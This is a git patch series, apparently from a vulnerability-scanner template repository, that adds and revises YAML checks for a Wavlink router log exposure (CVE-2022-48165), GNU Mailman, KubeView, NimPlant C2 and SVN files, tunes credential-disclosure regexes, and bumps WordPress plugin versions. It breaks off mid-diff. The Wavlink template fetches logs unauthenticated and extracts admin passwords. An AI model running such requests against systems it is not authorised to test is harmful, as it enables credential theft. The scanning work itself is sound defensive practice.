From 12dfdc42b00d35e8bba94312be43b529fa0d4dc4 Mon Sep 17 00:00:00 2001 From: For3stCo1d <57119052+For3stCo1d@users.noreply.github.com> Date: Mon, 6 Feb 2023 20:45:15 +0800 Subject: [PATCH 01/84] Create CVE-2022-48165.yaml --- cves/2022/CVE-2022-48165.yaml | 45 +++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 cves/2022/CVE-2022-48165.yaml diff --git a/cves/2022/CVE-2022-48165.yaml b/cves/2022/CVE-2022-48165.yaml new file mode 100644 index 0000000000..813326d5e9 --- /dev/null +++ b/cves/2022/CVE-2022-48165.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-48165 + +info: + name: Wavlink - Configuration Exposure + author: For3stCo1d + severity: high + description: | + An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN530H4 M30H4.V5030.210121 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials. + reference: + - https://docs.google.com/document/d/1HD4GKumkZpa6FNHuf0QQSKFvoYhCfwXpbyWiJdx1VtE + - https://twitter.com/For3stCo1d/status/1622576544190464000 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48165 + - https://github.com/strik3r0x1/Vulns/blob/main/WAVLINK_WL-WN530H4.md + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + tags: cve,cve2022,wavlink,router,exposure + +requests: + - raw: + - | + GET /cgi-bin/ExportLogs.sh HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Password=' + - 'Login=' + condition: and + + - type: word + part: header + words: + - filename="sysLogs.txt" + + - type: status + status: + - 200 + + extractors: + - type: regex + regex: + - 'Password=([^\s]+)' From 565e32fbda6194a891d43eadb223966e9164b0a2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 6 Feb 2023 19:46:21 +0530 Subject: [PATCH 02/84] minor -update --- cves/2022/CVE-2022-48165.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2022/CVE-2022-48165.yaml b/cves/2022/CVE-2022-48165.yaml index 813326d5e9..06b51e3fc6 100644 --- a/cves/2022/CVE-2022-48165.yaml +++ b/cves/2022/CVE-2022-48165.yaml @@ -12,6 +12,7 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48165 - https://github.com/strik3r0x1/Vulns/blob/main/WAVLINK_WL-WN530H4.md metadata: + verified: "true" shodan-query: http.title:"Wi-Fi APP Login" tags: cve,cve2022,wavlink,router,exposure From 39b2a665b297ebdb311e8693076fff6db9926fa1 Mon Sep 17 00:00:00 2001 From: Yablargo Date: Mon, 6 Feb 2023 11:24:38 -0500 Subject: [PATCH 03/84] Create gnu-mailman-detect.yaml Add detection for exposed /listinfo page for GNU mailman --- exposed-panels/gnu-mailman-detect.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 exposed-panels/gnu-mailman-detect.yaml diff --git a/exposed-panels/gnu-mailman-detect.yaml b/exposed-panels/gnu-mailman-detect.yaml new file mode 100644 index 0000000000..37aff36255 --- /dev/null +++ b/exposed-panels/gnu-mailman-detect.yaml @@ -0,0 +1,20 @@ +id: gnu-mailman-detect + +info: + name: GNU Mailman Detect + author: Matt Galligan + severity: info + description: Exposed GNU Mailman Listinfo + tags: panel, mailman + reference: + - https://list.org/ + +requests: + - method: GET + path: + - "{{BaseURL}}/mailman/listinfo" + - "{{BaseURL}}/listinfo" + matchers: + - type: word + words: + - "Delivered by Mailman" From 86f37b831a8159269d3e951a71c45e4af931d508 Mon Sep 17 00:00:00 2001 From: Yablargo Date: Mon, 6 Feb 2023 11:25:34 -0500 Subject: [PATCH 04/84] Create CVE-2021-42097.yaml Add CVE 2021 42097 Detection for GNU Mailman (Privesc/ CSRF Token Bypass) --- cves/2021/CVE-2021-42097.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2021/CVE-2021-42097.yaml diff --git a/cves/2021/CVE-2021-42097.yaml b/cves/2021/CVE-2021-42097.yaml new file mode 100644 index 0000000000..bb474adc59 --- /dev/null +++ b/cves/2021/CVE-2021-42097.yaml @@ -0,0 +1,35 @@ +id: cve-2021-42097 + +info: + name: GNU Mailman Remote Privilege Escalation + author: Matt Galligan + severity: high + description: GNU Mailman < 2.1.35 Privesc / CSRF Token Bypass + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42097 + - https://access.redhat.com/errata/RHSA-2021:4913 + - https://mail.python.org/archives/list/mailman-announce@python.org/thread/IKCO6JU755AP5G5TKMBJL6IEZQTTNPDQ/ + +requests: + - method: GET + path: + - "{{BaseURL}}/mailman/listinfo" + - "{{BaseURL}}/listinfo" + + extractors: + - type: regex + name: version + internal: true + group: 1 + regex: + - "(?m)version ([0-9.]+)" + + matchers-condition: and + matchers: + - type: word + words: + - "Delivered by Mailman" + + - type: dsl + dsl: + - to_string(version) < "2.1.35" From 95006fceb141cdc7d244395d6bbb8ab58f4d6941 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 6 Feb 2023 23:46:26 +0530 Subject: [PATCH 05/84] lint -fix --- cves/2021/CVE-2021-42097.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-42097.yaml b/cves/2021/CVE-2021-42097.yaml index bb474adc59..3b8f8200c7 100644 --- a/cves/2021/CVE-2021-42097.yaml +++ b/cves/2021/CVE-2021-42097.yaml @@ -14,7 +14,7 @@ requests: - method: GET path: - "{{BaseURL}}/mailman/listinfo" - - "{{BaseURL}}/listinfo" + - "{{BaseURL}}/listinfo" extractors: - type: regex From 60de07bab937e65defa903ee96dae34959f379f2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 6 Feb 2023 23:48:23 +0530 Subject: [PATCH 06/84] format -fix --- cves/2021/CVE-2021-42097.yaml | 23 ++++++++++++----------- 1 file changed, 12 insertions(+), 11 deletions(-) diff --git a/cves/2021/CVE-2021-42097.yaml b/cves/2021/CVE-2021-42097.yaml index 3b8f8200c7..4d064678e7 100644 --- a/cves/2021/CVE-2021-42097.yaml +++ b/cves/2021/CVE-2021-42097.yaml @@ -16,20 +16,21 @@ requests: - "{{BaseURL}}/mailman/listinfo" - "{{BaseURL}}/listinfo" + matchers-condition: and + matchers: + - type: word + words: + - "Delivered by Mailman" + + - type: dsl + dsl: + - to_string(version) < "2.1.35" + extractors: - type: regex name: version internal: true group: 1 regex: - - "(?m)version ([0-9.]+)" - - matchers-condition: and - matchers: - - type: word - words: - - "Delivered by Mailman" - - - type: dsl - dsl: - - to_string(version) < "2.1.35" + - "(?m)version ([0-9.]+)" + From c85480a74d1e15b196d0926cc4fbc589b1c2871b Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 6 Feb 2023 23:51:50 +0530 Subject: [PATCH 07/84] lint -fix --- exposed-panels/gnu-mailman-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/gnu-mailman-detect.yaml b/exposed-panels/gnu-mailman-detect.yaml index 37aff36255..cf0efb830d 100644 --- a/exposed-panels/gnu-mailman-detect.yaml +++ b/exposed-panels/gnu-mailman-detect.yaml @@ -6,14 +6,14 @@ info: severity: info description: Exposed GNU Mailman Listinfo tags: panel, mailman - reference: + reference: - https://list.org/ requests: - method: GET path: - "{{BaseURL}}/mailman/listinfo" - - "{{BaseURL}}/listinfo" + - "{{BaseURL}}/listinfo" matchers: - type: word words: From 4cf70148b12daa15dc40fb24bcdaea7793fe7f71 Mon Sep 17 00:00:00 2001 From: Yablargo Date: Mon, 6 Feb 2023 13:48:56 -0500 Subject: [PATCH 08/84] Update CVE-2021-42097.yaml Fix yaml lint on cve-2021-42097 --- cves/2021/CVE-2021-42097.yaml | 20 +++++++------------- 1 file changed, 7 insertions(+), 13 deletions(-) diff --git a/cves/2021/CVE-2021-42097.yaml b/cves/2021/CVE-2021-42097.yaml index 4d064678e7..6990f0262c 100644 --- a/cves/2021/CVE-2021-42097.yaml +++ b/cves/2021/CVE-2021-42097.yaml @@ -1,5 +1,4 @@ id: cve-2021-42097 - info: name: GNU Mailman Remote Privilege Escalation author: Matt Galligan @@ -9,28 +8,23 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-42097 - https://access.redhat.com/errata/RHSA-2021:4913 - https://mail.python.org/archives/list/mailman-announce@python.org/thread/IKCO6JU755AP5G5TKMBJL6IEZQTTNPDQ/ - requests: - method: GET path: - "{{BaseURL}}/mailman/listinfo" - "{{BaseURL}}/listinfo" - matchers-condition: and matchers: - type: word words: - - "Delivered by Mailman" - + - Delivered by Mailman - type: dsl dsl: - to_string(version) < "2.1.35" - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - "(?m)version ([0-9.]+)" - + - type: regex + name: version + internal: true + group: 1 + regex: + - (?m)version ([0-9.]+) From a03702ec670579dd8919a61f985ad04c733206fe Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 Feb 2023 09:43:27 +0530 Subject: [PATCH 09/84] meta-data change, change to BaseURL --- cves/2022/CVE-2022-48165.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-48165.yaml b/cves/2022/CVE-2022-48165.yaml index 06b51e3fc6..446f23327c 100644 --- a/cves/2022/CVE-2022-48165.yaml +++ b/cves/2022/CVE-2022-48165.yaml @@ -13,14 +13,13 @@ info: - https://github.com/strik3r0x1/Vulns/blob/main/WAVLINK_WL-WN530H4.md metadata: verified: "true" - shodan-query: http.title:"Wi-Fi APP Login" + shodan-query: http.favicon.hash:-1350437236 tags: cve,cve2022,wavlink,router,exposure requests: - - raw: - - | - GET /cgi-bin/ExportLogs.sh HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/cgi-bin/ExportLogs.sh" matchers-condition: and matchers: From eecd8bf380515a3d6200041ed31a937f0e541d1c Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 10 Feb 2023 19:13:09 +0530 Subject: [PATCH 10/84] minor update,name change --- exposed-panels/exposed-gnu-mailman.yaml | 33 +++++++++++++++++++++++++ exposed-panels/gnu-mailman-detect.yaml | 20 --------------- 2 files changed, 33 insertions(+), 20 deletions(-) create mode 100644 exposed-panels/exposed-gnu-mailman.yaml delete mode 100644 exposed-panels/gnu-mailman-detect.yaml diff --git a/exposed-panels/exposed-gnu-mailman.yaml b/exposed-panels/exposed-gnu-mailman.yaml new file mode 100644 index 0000000000..a1fd56a38b --- /dev/null +++ b/exposed-panels/exposed-gnu-mailman.yaml @@ -0,0 +1,33 @@ +id: exposed-gnu-mailman + +info: + name: Exposed GNU Mailman -Detect + author: Matt Galligan + severity: info + description: | + listing of all the public mailing lists + metadata: + verified: true + shodan-query: title:"Mailing Lists" + tags: tech,mailman + reference: + - https://list.org/ + +requests: + - method: GET + path: + - "{{BaseURL}}/mailman/listinfo" + - "{{BaseURL}}/listinfo" + + matchers-condition: and + matchers: + - type: word + words: + - "Delivered by Mailman" + - "Description" + - "list" + condition: and + + - type: status + status: + - 200 diff --git a/exposed-panels/gnu-mailman-detect.yaml b/exposed-panels/gnu-mailman-detect.yaml deleted file mode 100644 index cf0efb830d..0000000000 --- a/exposed-panels/gnu-mailman-detect.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: gnu-mailman-detect - -info: - name: GNU Mailman Detect - author: Matt Galligan - severity: info - description: Exposed GNU Mailman Listinfo - tags: panel, mailman - reference: - - https://list.org/ - -requests: - - method: GET - path: - - "{{BaseURL}}/mailman/listinfo" - - "{{BaseURL}}/listinfo" - matchers: - - type: word - words: - - "Delivered by Mailman" From de90e9b5941d9d9e772f340f3f62159005d03969 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 10 Feb 2023 19:31:00 +0530 Subject: [PATCH 11/84] minor -update --- exposed-panels/exposed-gnu-mailman.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/exposed-panels/exposed-gnu-mailman.yaml b/exposed-panels/exposed-gnu-mailman.yaml index a1fd56a38b..a2b414460e 100644 --- a/exposed-panels/exposed-gnu-mailman.yaml +++ b/exposed-panels/exposed-gnu-mailman.yaml @@ -9,9 +9,7 @@ info: metadata: verified: true shodan-query: title:"Mailing Lists" - tags: tech,mailman - reference: - - https://list.org/ + tags: exposure,mailman requests: - method: GET From d5f2d1b9e27ed312344c39f4238b8625360a6e94 Mon Sep 17 00:00:00 2001 From: sduc Date: Mon, 13 Feb 2023 10:35:31 +0100 Subject: [PATCH 12/84] credentials-disclosure: regex accessToken regex matching accessToken matches on `"accessToken":null` which is a false positive. This PR attempts to resolve this by explicitly asking the regex to not match null. --- exposures/tokens/generic/credentials-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/tokens/generic/credentials-disclosure.yaml b/exposures/tokens/generic/credentials-disclosure.yaml index d89477b96f..7d466608bc 100644 --- a/exposures/tokens/generic/credentials-disclosure.yaml +++ b/exposures/tokens/generic/credentials-disclosure.yaml @@ -705,7 +705,7 @@ requests: - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?air[-_]?table[-_]?api[-_]?key[\"']?[=:][\"']?.+[\"']" - "(?i)[\"']?adzerk[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*(?!null)[\"']?[\\w-]+[\"']?" - "(?i)[\"']?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" From 239f8d6b6de70f98a0a2cc999116cab5e77361e4 Mon Sep 17 00:00:00 2001 From: Rizwan Syed <78642744+mr-rizwan-syed@users.noreply.github.com> Date: Mon, 13 Feb 2023 16:17:37 +0530 Subject: [PATCH 13/84] Update svn-wc-db.yaml Most of the time wc.db file is big in size, response from the web server may take time, could lead to content deadline exceeded error, even if the wc.db file exist. So I change the HTTP Method to HEAD Also, I change the rating to High because it could lead to source code disclosure. I cross verified with one of my target, current template does not work, so here is the revised one. Reference: https://infosecwriteups.com/indias-aadhar-card-source-code-disclosure-via-exposed-svn-wc-db-c05519ea7761 --- exposures/files/svn-wc-db.yaml | 15 ++++----------- 1 file changed, 4 insertions(+), 11 deletions(-) diff --git a/exposures/files/svn-wc-db.yaml b/exposures/files/svn-wc-db.yaml index 8b83ed7c27..cc477d7c8a 100644 --- a/exposures/files/svn-wc-db.yaml +++ b/exposures/files/svn-wc-db.yaml @@ -2,30 +2,23 @@ id: svn-wc-db info: name: SVN wc.db File Exposure - author: Hardik-Solanki - severity: medium + author: Hardik-Solanki, R12W4N + severity: High reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/svn_wcdb_scanner.rb + - https://infosecwriteups.com/indias-aadhar-card-source-code-disclosure-via-exposed-svn-wc-db-c05519ea7761 metadata: verified: true google-query: intitle:"index of" "wc.db" tags: msf,exposure,svn,config,files requests: - - method: GET + - method: HEAD path: - "{{BaseURL}}/.svn/wc.db" - matchers-condition: and matchers: - - type: word - part: body - words: - - 'SQLite format' - - 'WCROOT' - condition: and - - type: status status: - 200 From 4926c2951ab3d8915ad89a9be699974e14c7f0b3 Mon Sep 17 00:00:00 2001 From: Rizwan Syed <78642744+mr-rizwan-syed@users.noreply.github.com> Date: Mon, 13 Feb 2023 16:23:06 +0530 Subject: [PATCH 14/84] Update svn-wc-db.yaml --- exposures/files/svn-wc-db.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/svn-wc-db.yaml b/exposures/files/svn-wc-db.yaml index cc477d7c8a..a22163ec8e 100644 --- a/exposures/files/svn-wc-db.yaml +++ b/exposures/files/svn-wc-db.yaml @@ -17,6 +17,7 @@ requests: - method: HEAD path: - "{{BaseURL}}/.svn/wc.db" + - "{{RootURL}}/.svn/wc.db" matchers: - type: status From b3559259563ff442c583140a124295eb750d290c Mon Sep 17 00:00:00 2001 From: sduc Date: Mon, 13 Feb 2023 16:38:59 +0100 Subject: [PATCH 15/84] error --- exposures/tokens/generic/credentials-disclosure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/tokens/generic/credentials-disclosure.yaml b/exposures/tokens/generic/credentials-disclosure.yaml index 7d466608bc..487b518396 100644 --- a/exposures/tokens/generic/credentials-disclosure.yaml +++ b/exposures/tokens/generic/credentials-disclosure.yaml @@ -705,8 +705,8 @@ requests: - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?air[-_]?table[-_]?api[-_]?key[\"']?[=:][\"']?.+[\"']" - "(?i)[\"']?adzerk[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*(?!null)[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*(?!null)[\"']?[\\w-]+[\"']?" - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" From bb248f4bb081f180e8070d39188593096bea7c8d Mon Sep 17 00:00:00 2001 From: root Date: Fri, 24 Feb 2023 21:09:31 +0530 Subject: [PATCH 16/84] kubeview-dashboard-detect --- exposed-panels/kubeview-dashboard-detect.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/kubeview-dashboard-detect.yaml diff --git a/exposed-panels/kubeview-dashboard-detect.yaml b/exposed-panels/kubeview-dashboard-detect.yaml new file mode 100644 index 0000000000..9285654987 --- /dev/null +++ b/exposed-panels/kubeview-dashboard-detect.yaml @@ -0,0 +1,21 @@ +id: kubeview-dashboard-detection + +info: + name: KubeView Dashboard Exposure + author: ja1sh + severity: info + description: An attacker can detect the public instance of a KubeView dashboard + tags: dashboard,information disclosure,k8s,dashboard,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - KubeView + From b292a3829b99815fbced323ef12d5ac465471483 Mon Sep 17 00:00:00 2001 From: root Date: Fri, 24 Feb 2023 21:29:48 +0530 Subject: [PATCH 17/84] kubeview-dashboard-detect --- exposed-panels/kubeview-dashboard-detect.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposed-panels/kubeview-dashboard-detect.yaml b/exposed-panels/kubeview-dashboard-detect.yaml index 9285654987..292e0888e4 100644 --- a/exposed-panels/kubeview-dashboard-detect.yaml +++ b/exposed-panels/kubeview-dashboard-detect.yaml @@ -5,7 +5,9 @@ info: author: ja1sh severity: info description: An attacker can detect the public instance of a KubeView dashboard - tags: dashboard,information disclosure,k8s,dashboard,exposure + tags: dashboard,k8s,dashboard,exposure + metadata: + shodan-query: "http.favicon.hash:-379154636" requests: - method: GET From 0ed80204e4ffcd10d5e686700b1f4102d6ed87a5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 25 Feb 2023 14:03:13 +0530 Subject: [PATCH 18/84] fixed-template --- exposed-panels/kubeview-dashboard-detect.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/exposed-panels/kubeview-dashboard-detect.yaml b/exposed-panels/kubeview-dashboard-detect.yaml index 292e0888e4..b0cc6808b5 100644 --- a/exposed-panels/kubeview-dashboard-detect.yaml +++ b/exposed-panels/kubeview-dashboard-detect.yaml @@ -1,13 +1,15 @@ -id: kubeview-dashboard-detection +id: kubeview-dashboard info: name: KubeView Dashboard Exposure author: ja1sh severity: info - description: An attacker can detect the public instance of a KubeView dashboard - tags: dashboard,k8s,dashboard,exposure + description: | + An attacker can detect the public instance of a KubeView dashboard metadata: + verified: "true" shodan-query: "http.favicon.hash:-379154636" + tags: k8s,kubernetes,kubeview,dashboard,exposure requests: - method: GET @@ -21,3 +23,6 @@ requests: words: - KubeView + - type: status + status: + - 200 From bcac3baf62f86ab385fc851b100ca1202ff1327a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 25 Feb 2023 14:03:37 +0530 Subject: [PATCH 19/84] rename --- .../{kubeview-dashboard-detect.yaml => kubeview-dashboard.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{kubeview-dashboard-detect.yaml => kubeview-dashboard.yaml} (100%) diff --git a/exposed-panels/kubeview-dashboard-detect.yaml b/exposed-panels/kubeview-dashboard.yaml similarity index 100% rename from exposed-panels/kubeview-dashboard-detect.yaml rename to exposed-panels/kubeview-dashboard.yaml From a78bf7a5edce62e9a732e435cc7ac4707a919fb7 Mon Sep 17 00:00:00 2001 From: root Date: Mon, 27 Feb 2023 00:39:03 +0530 Subject: [PATCH 20/84] nimplant-c2-server --- exposed-panels/c2/nimplant-c2.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/c2/nimplant-c2.yaml diff --git a/exposed-panels/c2/nimplant-c2.yaml b/exposed-panels/c2/nimplant-c2.yaml new file mode 100644 index 0000000000..47c0d77dc5 --- /dev/null +++ b/exposed-panels/c2/nimplant-c2.yaml @@ -0,0 +1,26 @@ +id: nimplant-c2-server + +info: + name: NimPlant C2 Server Detection + author: ja1sh + severity: info + reference: + - https://github.com/chvancooten/NimPlant + description: | + An attacker can detect the public instance of a NimPlant C2 Framework + metadata: + verified: "true" + shodan-query: "nimplant C2 server" + tags: nimplant,c2 framework,detection,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "NimPlant C2" From bbe2345bd82d8239c07bfda4c54f665c79f1c3fd Mon Sep 17 00:00:00 2001 From: Sergey Ryadinskikh <57674875+SergeyRyadinskikh@users.noreply.github.com> Date: Mon, 27 Feb 2023 16:23:20 +0200 Subject: [PATCH 21/84] Update swagger-api.yaml --- exposures/apis/swagger-api.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/apis/swagger-api.yaml b/exposures/apis/swagger-api.yaml index b215311f95..cf50951d9a 100644 --- a/exposures/apis/swagger-api.yaml +++ b/exposures/apis/swagger-api.yaml @@ -69,6 +69,8 @@ requests: - "{{BaseURL}}/api/swagger_doc.json" - "{{BaseURL}}/docu" - "{{BaseURL}}/docs" + - "{{BaseURL}}/swagger" + - "{{BaseURL}}/api-doc" headers: Accept: text/html From 5b879490dc508f02e050b9dff9fef0cddd426f0a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Feb 2023 04:02:07 +0000 Subject: [PATCH 22/84] Auto WordPress Plugins Update [Tue Feb 28 04:02:07 UTC 2023] :robot: --- helpers/wordpress/plugins/broken-link-checker.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/intuitive-custom-post-order.txt | 2 +- helpers/wordpress/plugins/kadence-blocks.txt | 2 +- helpers/wordpress/plugins/meta-box.txt | 2 +- helpers/wordpress/plugins/post-smtp.txt | 2 +- helpers/wordpress/plugins/smart-slider-3.txt | 2 +- helpers/wordpress/plugins/webp-converter-for-media.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- 9 files changed, 9 insertions(+), 9 deletions(-) diff --git a/helpers/wordpress/plugins/broken-link-checker.txt b/helpers/wordpress/plugins/broken-link-checker.txt index 52e7d0fa58..359a5b952d 100644 --- a/helpers/wordpress/plugins/broken-link-checker.txt +++ b/helpers/wordpress/plugins/broken-link-checker.txt @@ -1 +1 @@ -1.11.21 \ No newline at end of file +2.0.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 0c9d1ec658..ee7380d66e 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -15.2.1 \ No newline at end of file +15.2.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/intuitive-custom-post-order.txt b/helpers/wordpress/plugins/intuitive-custom-post-order.txt index b532f3dc33..28cec4ac87 100644 --- a/helpers/wordpress/plugins/intuitive-custom-post-order.txt +++ b/helpers/wordpress/plugins/intuitive-custom-post-order.txt @@ -1 +1 @@ -3.1.4 \ No newline at end of file +3.1.4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index 49b88e3f68..a99de22da7 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.0.16 \ No newline at end of file +3.0.17 \ No newline at end of file diff --git a/helpers/wordpress/plugins/meta-box.txt b/helpers/wordpress/plugins/meta-box.txt index 240bf8ead1..2ea33cb9e7 100644 --- a/helpers/wordpress/plugins/meta-box.txt +++ b/helpers/wordpress/plugins/meta-box.txt @@ -1 +1 @@ -5.6.16 \ No newline at end of file +5.6.17 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index acdc3f1b0b..6550da6970 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.4.2 \ No newline at end of file +2.4.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/smart-slider-3.txt b/helpers/wordpress/plugins/smart-slider-3.txt index d4c99db2a5..88390bd950 100644 --- a/helpers/wordpress/plugins/smart-slider-3.txt +++ b/helpers/wordpress/plugins/smart-slider-3.txt @@ -1 +1 @@ -3.5.1.13 \ No newline at end of file +3.5.1.14 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index edb1d397cf..885bc9f72d 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.8.0 \ No newline at end of file +5.8.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index c7ba1e87f7..1e20ec35c6 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -5.5.0 \ No newline at end of file +5.4.0 \ No newline at end of file From 93edc1de574ca494155549a40cac117cb5edfafd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 1 Mar 2023 04:02:05 +0000 Subject: [PATCH 23/84] Auto WordPress Plugins Update [Wed Mar 1 04:02:05 UTC 2023] :robot: --- .../plugins/click-to-chat-for-whatsapp.txt | 2 +- .../wordpress/plugins/elementskit-lite.txt | 2 +- .../essential-addons-for-elementor-lite.txt | 2 +- .../plugins/facebook-for-woocommerce.txt | 2 +- helpers/wordpress/plugins/google-site-kit.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/kadence-blocks.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- .../plugins/premium-addons-for-elementor.txt | 2 +- helpers/wordpress/plugins/woocommerce.txt | 2 +- helpers/wordpress/plugins/wordpress-seo.txt | 2 +- helpers/wordpress/plugins/wp-migrate-db.txt | 2 +- helpers/wordpress/plugins/wpforms-lite.txt | 2 +- .../plugins/wpvivid-backuprestore.txt | 1 + .../wordpress/plugins/elementskit-lite.yaml | 2 +- .../plugins/wpvivid-backuprestore.yaml | 49 +++++++++++++++++++ 16 files changed, 64 insertions(+), 14 deletions(-) create mode 100644 helpers/wordpress/plugins/wpvivid-backuprestore.txt create mode 100644 technologies/wordpress/plugins/wpvivid-backuprestore.yaml diff --git a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt index 93a84c3800..2ef9c6687c 100644 --- a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt +++ 